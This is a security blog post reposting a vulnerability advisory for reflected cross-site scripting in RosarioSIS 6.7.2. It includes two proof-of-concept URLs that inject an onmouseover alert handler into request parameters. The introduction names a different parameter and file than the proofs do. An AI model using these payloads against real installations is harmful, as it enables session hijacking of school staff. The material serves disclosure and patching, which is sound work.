Latest Tech

Latest Posts

RosarioSIS 6.7.2 Cross Site Scripting

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 134
RosarioSIS 6.7.2 Cross Site Scripting
RosarioSIS 6.7.2 Cross Site Scripting
RosarioSIS version 6.7.2 is susceptible to a reflected Cross-Site Scripting RosarioSIS version 6.7.2 is susceptible to a reflected Cross-Site Scripting (XSS) vulnerability.

The flaw exists in the `index.php` file, specifically due to insufficient sanitization of the `modname` parameter. An attacker can craft a malicious URL containing JavaScript code within the `modname` parameter.

If an authenticated user clicks this crafted link, the malicious script is executed in their browser. This allows for session hijacking, unauthorized actions, data theft, or defacement of the application within the user's context.

The vulnerability was addressed in RosarioSIS version 6.7.3 through improved input validation and output encoding. Users are strongly advised to upgrade to the latest version to mitigate this risk.

# Exploit Title: RosarioSIS 6.7.2 - Cross-Site Scripting (XSS)
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://gitlab.com/francoisjacquet/rosariosis
# Software Link: https://gitlab.com/francoisjacquet/rosariosis
# Version: 6.7.2
# Tested on: Windows
# CVE : CVE-2020-15718

Proof Of Concept
http://rosariosis/Modules.php?modname=Scheduling/PrintSchedules.php&search_modfunc=list&include_inactive=" onmouseover="alert(1)"


Steps to Reproduce
Log in as an admin user.
Send the request.
Observe the result.

# Exploit Title: RosarioSIS 6.7.2 - Cross Site Scripting (XSS)
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://gitlab.com/francoisjacquet/rosariosis
# Software Link: https://gitlab.com/francoisjacquet/rosariosis
# Version: 6.7.2
# Tested on: Windows
# CVE : CVE-2020-15716


Proof Of Concept
http://rosariosis/Modules.php?modname=Users/Preferences.php&tab=%22%20onmouseover%3Dalert%281%29%20x%3D%22

**Conditions**:
1. User must be authenticated (as shown by the session checks in `Warehous.php`)
2. `modfunc` parameter must **not** be present in the request


Steps to Reproduce:
1. Log in as an admin user.
2. Send the request.
3. Observe the result

Information Security

Social Media Share
About Contact Terms of Use Privacy Policy
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸
All content is for educational purposes only. Unauthorized use of any information on this site is strictly prohibited.